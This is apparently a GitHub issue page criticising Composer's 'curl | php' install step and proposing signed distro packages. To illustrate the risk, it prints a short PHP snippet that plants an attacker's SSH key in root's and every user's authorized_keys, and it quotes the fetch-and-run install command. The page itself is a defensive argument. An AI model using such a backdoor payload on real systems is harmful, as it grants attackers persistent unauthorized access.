composer: Bad Security Habits

https://getcomposer.org/download/ “Run this in your terminal to get the latest Composer version:”

curl -sS https://getcomposer.org/installer | php

Okay, does anyone else see how this could possibly be a bad habit for users to get into?

Steps to exploit:

  1. Hack getcomposer.org
  2. Serve something like this instead of the standard installer:
<?php
if( `whoami` !== 'root' ) {
    die("Permission denied. Try running with sudo");
}
file_put_contents("/root/.ssh/authorized_keys", $attacker_rsa_pub);
chdir("/home");
foreach(glob("*") as $d) {
    if(is_dir($d)) {
        file_put_contents("/home/{$d}/.ssh/authorized_keys", $attacker_rsa_pub);
    }
}
// Rest of composer code below
?>

Solution: Submit a cryptographically signed package for inclusion in repositories (Debian, Ubuntu, etc.). Replace your instructions to something like:

sudo apt-get install composer

About this issue

  • Original URL
  • State: closed
  • Created 10 years ago
  • Comments: 31 (16 by maintainers)

Commits related to this issue

Most upvoted comments

@Seldaek I’m not sure what the point of the new instructions are. Both the instructions and the installer come from the same server, so if it’s compromised, so is the hash in the instructions. It seems to me that’s just making the installation more complicated without any gain in security?

+1
naderman on Mar 18, 2016
Read more comments on GitHub
← composer: Autoloading not working in child threads on PHP5.6 or higher
composer: bitbucket oauth not working →